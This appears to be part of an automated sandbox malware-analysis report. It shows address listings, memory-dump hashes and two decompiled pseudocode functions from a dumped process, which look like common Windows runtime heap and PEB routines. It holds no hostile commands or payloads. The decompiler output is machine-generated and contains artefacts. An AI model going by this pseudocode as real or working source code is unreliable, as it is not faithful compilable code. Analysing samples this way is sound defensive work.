0x00000000
0x053dd8ed
0x053dd7cc
0x053dd7cc
0x053dd7d2
0x00000000
0x053dd7d4
0x053dd7d4
0x053dd7d7
0x053dd7df
0x0542b3d4
0x0542b3d9
0x0542b3dc
0x0542b3dc
0x0542b3df
0x0542b3e2
0x0542b468
0x0542b46d
0x0542b46f
0x0542b46f
0x0542b475
0x053dd8f8
0x053dd8f9
0x053dd8fd
0x0542b3e8
0x0542b3e8
0x0542b3eb
0x0542b3ed
0x00000000
0x0542b3ef
0x0542b3ef
0x0542b3f1
0x0542b3f4
0x0542b3fe
0x0542b404
0x0542b409
0x0542b40e
0x0542b410
0x0542b410
0x0542b414
0x0542b414
0x0542b41b
0x0542b420
0x0542b423
0x0542b425
0x0542b427
0x0542b42a
0x0542b42d
0x0542b42d
0x0542b42a
0x0542b432
0x0542b436
0x0542b438
0x0542b43b
0x0542b43b
0x0542b449
0x0542b44e
0x0542b454
0x0542b458
0x0542b458
0x0542b45d
0x00000000
0x0542b45d
0x0542b3ed
0x00000000
0x00000000
0x00000000
0x053dd7df
0x053dd7d2
0x053dd7ca
0x0542b37c
0x0542b37e
0x0542b385
0x0542b38a
0x00000000
0x0542b38a
0x053dd742
0x053dd7f1
0x053dd7f8
0x0542b49b
0x0542b49b
0x053dd800
0x053dd837
0x053dd843
0x053dd845
0x053dd847
0x053dd84a
0x053dd84b
0x053dd84e
0x053dd857
0x053dd818
0x053dd824
0x053dd831
0x0542b4a5
0x0542b4ab
0x0542b4b3
0x0542b4b8
0x0542b4bb
0x00000000
0x0542b4c1
0x0542b4c1
0x0542b4c8
0x00000000
0x0542b4ce
0x0542b4d4
0x0542b4e1
0x0542b4e3
0x0542b4e5
0x00000000
0x0542b4eb
0x0542b4f0
0x0542b4f2
0x053ddac9
0x053ddacc
0x053ddacf
0x053ddad1
0x053ddd78
0x053ddd78
0x053ddcf2
0x00000000
0x053ddad7
0x053ddad9
0x053ddadb
0x00000000
0x00000000
0x053ddae1
0x053ddae1
0x053ddae4
0x053ddae6
0x0542b4f9
0x0542b4f9
0x0542b500
0x053ddaec
0x053ddaec
0x053ddaf5
0x053ddaf8
0x053ddafb
0x053ddb03
0x053ddb11
0x053ddb16
0x053ddb19
0x053ddb1b
0x0542b52c
0x0542b531
0x0542b534
0x053ddb21
0x053ddb21
0x053ddb24
0x053ddcd9
0x053ddce2
0x053ddce5
0x053ddd6a
0x053ddd6d
0x00000000
0x053ddd73
0x0542b51a
0x0542b51c
0x0542b51f
0x0542b524
0x00000000
0x0542b524
0x053ddce7
0x053ddce7
0x053ddce7
0x00000000
0x053ddce7
0x00000000
0x053ddb2a
0x053ddb2c
0x053ddb31
0x053ddb33
0x053ddb36
0x053ddb39
0x053ddb3b
0x053ddb66
0x053ddb66
0x053ddb3d
0x053ddb3d
0x053ddb3e
0x053ddb46
0x053ddb47
0x053ddb49
0x053ddb4c
0x053ddb53
0x053ddb55
0x053ddb58
0x053ddb5a
0x0542b50a
0x0542b50f
0x0542b512
0x053ddb60
0x053ddb60
0x053ddb63
0x053ddb63
0x00000000
0x053ddb63
0x053ddb5a
0x053ddb3b
0x053ddb24
0x053ddb69
0x053ddb69
0x053ddb6c
0x053ddb6f
0x053ddb74
0x0542b557
0x0542b557
0x0542b55e
0x053ddb7a
0x053ddb7c
0x053ddb7f
0x053ddb82
0x053ddb85
0x00000000
0x053ddb8b
0x053ddb8b
0x053ddb8d
0x053ddb9b
0x053ddb9b
0x053ddb9d
0x053ddba0
0x053ddba2
0x053ddba4
0x053ddba7
0x053ddba9
0x053ddbae
0x053ddbae
0x053ddbb1
0x053ddbb4
0x053ddbb4
0x053ddbb7
0x053ddbba
0x053ddcd2
0x053ddcd4
0x00000000
0x053ddbc0
0x053ddbc0
0x053ddbd2
0x053ddbd7
0x053ddbda
0x053ddbdd
0x053ddbdf
0x00000000
0x053ddbe5
0x053ddbe5
0x053ddbee
0x053ddbf1
0x0542b541
0x0542b544
0x00000000
0x0542b546
0x0542b546
0x00000000
0x0542b546
0x053ddbf7
0x053ddbf7
0x053ddbfd
0x053ddbfd
0x053ddbff
0x053ddc0b
0x053ddc15
0x053ddc1b
0x053ddc1d
0x053ddc21
0x053ddc21
0x053ddc23
0x053ddc23
0x053ddc26
0x053ddc29
0x053ddc2b
0x00000000
0x00000000
0x053ddc31
0x053ddc34
0x053ddc36
0x053ddcbf
0x053ddcbf
0x053ddcc2
0x00000000
0x053ddc3c
0x053ddc41
0x053ddc43
0x00000000
0x053ddc45
0x053ddc45
0x053ddc47
0x00000000
0x053ddc4d
0x053ddc4d
0x053ddc50
0x053ddc52
0x053ddc55
0x053ddcfa
0x053ddcfe
0x053ddd08
0x053ddd0a
0x053ddd0c
0x00000000
0x053ddd12
0x053ddd15
0x053ddd2d
0x053ddd2f
0x053ddd32
0x053ddd35
0x00000000
0x053ddd35
0x053ddc5b
0x053ddc5b
0x053ddc5e
0x053ddc61
0x053ddc64
0x053ddc67
0x053ddc67
0x053ddc6a
0x053ddc6c
0x053ddc8e
0x053ddc8e
0x053ddc91
0x053ddc93
0x053ddcce
0x053ddcce
0x053ddc95
0x053ddc9c
0x053ddc6e
0x053ddc72
0x053ddc75
0x053ddc77
0x053ddc79
0x0542b551
0x0542b551
0x00000000
0x053ddc7f
0x053ddc7f
0x053ddc81
0x00000000
0x053ddc83
0x053ddc86
0x053ddc88
0x00000000
0x00000000
0x00000000
0x00000000
0x053ddc88
0x053ddc81
0x053ddc79
0x053ddc6c
0x053ddc55
0x053ddc47
0x053ddc43
0x00000000
0x053ddc36
0x053ddc23
0x00000000
0x053ddbff
0x053ddbf1
0x053ddbdf
0x053ddb8f
0x053ddb92
0x053ddb95
0x00000000
0x00000000
0x00000000
0x00000000
0x053ddb95
0x053ddb8d
0x053ddb85
0x053ddb74
0x053ddc9f
0x053ddca2
0x053ddcb0
0x053ddcb0
0x053ddad1
0x0542b4e5
0x0542b4c8
0x00000000
0x00000000
0x00000000
0x053dd831
0x00000000
0x053dd800
0x0542b47f
0x0542b485
0x00000000
0x0542b485
0x053dd665
0x053dd652
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca08f4f3ca4e5ff3498436b5c8a52d89b44e719a9de3a4bb69c2de59dfc0e606
Instruction ID: 45fb2dbb17dc8f07993f1725c6a81237e254af92902705199c3c7c86ac4e46ae
Opcode Fuzzy Hash: ca08f4f3ca4e5ff3498436b5c8a52d89b44e719a9de3a4bb69c2de59dfc0e606
Instruction Fuzzy Hash: D3E1C332B043698FEB25CF14D884BAAF7B6FF45304F4445DAD80A97691DB70A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 053D849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E053D849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x549f9c0);
				E0541D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x54b7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E053DCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E053E2280( *[fs:0x30], 0x54b8550);
						_t139 =  *0x54b7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E053FF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E053DFFB0(_t193, _t235, 0x54b8550);
								L5:
								return E0541D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E053C1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x54b7b9c; // 0x0
							_t235 = L053E4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x54b7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E053FA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E053DFFB0(_t193, _t235, 0x54b8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L053E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L053E77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x54b7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x54b7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E054037C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x54b7b9c; // 0x0
									_t214 = L053E4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E054037F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x54b7b10 =  *0x54b7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x54b7b04 =  *0x54b7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L053E77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L053E77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x54b7b08 =  *0x54b7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E054057C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0540F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L053E77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E053FA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L053E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E054096C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x053d849b
0x053d849b
0x053d849b
0x053d849b
0x053d849d
0x053d84a2
0x053d84a7
0x053d84b1
0x053d84d8
0x00000000
0x053d84b3
0x053d84c4
0x053d84c9
0x053d84cd
0x053d84cf
0x053d84cf
0x053d84d6
0x053d84e6
0x053d84e9
0x053d84ec
0x053d84ef
0x053d84f2
0x053d84f4
0x053d84fc
0x053d8501
0x053d8506
0x053d8509
0x053d86e0
0x053d86e5
0x053d86e8
0x053d86ed
0x053d86f0
0x053d86f2
0x05429afd
0x05429b02
0x053d84da
0x053d84df
0x053d84df
0x053d86fa
0x053d86fd
0x053d86fe
0x053d8701
0x053d8706
0x053d8709
0x053d870b
0x00000000
0x00000000
0x053d8711
0x053d8725
0x053d8727
0x053d872a
0x053d872c
0x05429af0
0x05429af5
0x053d8732
0x053d8732
0x053d8732
0x053d8735
0x053d8737
0x053d8515
0x053d8515
0x053d8518
0x053d851d
0x053d8523
0x053d8527
0x053d852b
0x053d8537
0x053d8539
0x053d853c
0x053d853e
0x053d868c
0x053d8691
0x053d8699
0x053d869b
0x053d8744
0x053d8748
0x053d86a1
0x053d86a1
0x053d86a1
0x053d86a4
0x053d86a8
0x05429bdf
0x05429bdf
0x053d86ae
0x053d86b0
0x00000000
0x053d86b6
0x00000000
0x05429be9
0x053d86b0
0x053d8544
0x053d854a
0x053d854d
0x053d8551
0x053d876e
0x053d8778
0x053d877b
0x053d8780
0x053d8557
0x053d8557
0x053d855d
0x053d855d
0x053d856b
0x053d856e
0x053d8570
0x053d8573
0x053d8576
0x053d8576
0x053d8579
0x053d857b
0x00000000
0x00000000
0x053d8581
0x053d85a0
0x053d85a2
0x053d85a5
0x053d85a7
0x05429b1b
0x05429b1b
0x053d862e
0x053d862e
0x053d8631
0x053d8631
0x053d8634
0x053d8636
0x053d8669
0x053d8669
0x053d866b
0x05429bbf
0x05429bc4
0x05429bc8
0x05429bce
0x05429bce
0x053d8671
0x053d8671
0x053d8674
0x053d8676
0x05429bae
0x05429bae
0x053d8676
0x053d867c
0x053d867e
0x053d8688
0x053d8688
0x00000000
0x053d867e
0x053d8638
0x053d8638
0x053d863b
0x053d863e
0x053d863f
0x053d8642
0x053d8645
0x053d8648
0x053d864d
0x05429b69
0x05429b6e
0x05429b7b
0x05429b81
0x05429b85
0x05429b89
0x05429ba7
0x05429b8b
0x05429b91
0x05429b9a
0x05429b9f
0x05429b9f
0x053d8788
0x053d878d
0x053d8763
0x053d8763
0x053d8766
0x00000000
0x053d8766
0x05429b70
0x00000000
0x05429b70
0x053d8656
0x053d865a
0x053d865c
0x053d8752
0x053d8756
0x00000000
0x00000000
0x053d875e
0x00000000
0x053d875e
0x053d8662
0x053d8662
0x053d8662
0x053d8666
0x00000000
0x053d8666
0x053d85b7
0x053d85b9
0x053d85bc
0x053d85bf
0x053d85cc
0x053d85d1
0x053d85d4
0x053d85db
0x053d85de
0x053d85e0
0x05429b5f
0x00000000
0x05429b5f
0x053d85e6
0x053d85ea
0x053d86c3
0x053d86c5
0x053d86c8
0x053d86ca
0x05429b16
0x00000000
0x05429b16
0x053d86d6
0x053d85f6
0x053d85f6
0x053d85f9
0x053d8602
0x053d8606
0x053d860a
0x053d860b
0x053d860e
0x053d8611
0x00000000
0x053d8611
0x053d85f3
0x00000000
0x053d85f3
0x053d8619
0x053d861e
0x053d861e
0x053d8621
0x053d8622
0x053d8623
0x053d8625
0x053d862c
0x00000000
0x053d873d
0x00000000
0x053d873d
0x053d8737
0x053d850f
0x053d8512
0x00000000
0x053d8512
0x00000000
0x053d84d6

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 395c2643ad0713346ed8e9d42cc8f3abb8fc2f02cf2be2ef5d81ea65c8729d27
Instruction ID: 4c49e5731efbe829428bf360eb7ddaf3cae610479591e340c3dff6bf64a23fc0
Opcode Fuzzy Hash: 395c2643ad0713346ed8e9d42cc8f3abb8fc2f02cf2be2ef5d81ea65c8729d27
Instruction Fuzzy Hash: 21B19C71E04219DFDB19CFA9D888AEDFBBAFF48304F10412AE505AB745D770A941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 053F513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E053F513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x54bd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0540D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E053E2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L053E4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0540F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E053DFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x54bb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0540B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x053f5142
0x053f514c
0x053f5150
0x053f5157
0x053f5159
0x053f515e
0x053f5165
0x053f5169
0x053f516c
0x053f5172
0x053f5176
0x053f517a
0x053f517a
0x053f517a
0x053f517f
0x05436d8b
0x05436d8e
0x05436d91
0x05436d95
0x05436d98
0x05436d9c
0x05436da0
0x05436da3
0x05436da7
0x05436e26
0x05436e26
0x05436e2a
0x053f51f9
0x053f51f9
0x053f51fe
0x05436e33
0x05436e33
0x05436e39
0x05436e3d
0x05436e46
0x05436e50
0x00000000
0x00000000
0x05436e52
0x05436e53
0x05436e56
0x05436e5d
0x00000000
0x00000000
0x00000000
0x05436e5f
0x05436e67
0x05436e77
0x05436e7f
0x05436e80
0x05436e88
0x05436e90
0x05436e9f
0x05436ea5
0x05436ea9
0x05436eb1
0x05436ebf
0x00000000
0x00000000
0x05436ecf
0x05436ed3
0x00000000
0x00000000
0x05436edb
0x05436ede
0x05436ee1
0x05436ee8
0x05436eeb
0x05436eed
0x05436ef0
0x05436ef4
0x05436ef8
0x05436efc
0x00000000
0x00000000
0x05436f0d
0x05436f11
0x05436f32
0x05436f37
0x05436f3b
0x05436f3e
0x05436f41
0x05436f46
0x00000000
0x00000000
0x05436f4c
0x05436f50
0x05436f50
0x05436f54
0x05436f62
0x05436f65
0x05436f6d
0x05436f7b
0x05436f7b
0x05436f93
0x05436f98
0x05436fa0
0x05436fa6
0x05436fb3
0x05436fb6
0x05436fbf
0x05436fc1
0x05436fd5
0x05436fda
0x05436fda
0x05436fdd
0x05436fe2
0x05436fe7
0x05436feb
0x05436fef
0x05436ff3
0x053f520c
0x053f520c
0x053f520f
0x053f5215
0x053f5234
0x053f523a
0x053f523a
0x053f5244
0x053f5245
0x053f5246
0x053f5251
0x053f5251
0x05436f13
0x05436f17
0x05436f17
0x05436f18
0x05436f1b
0x05436f1f
0x05436f23
0x00000000
0x05436f28
0x053f5204
0x053f5204
0x053f5208
0x00000000
0x053f5208
0x053f5185
0x053f5188
0x053f518a
0x053f518e
0x053f5195
0x05436db1
0x05436db5
0x05436db9
0x053f519b
0x053f519b
0x053f519e
0x053f51a7
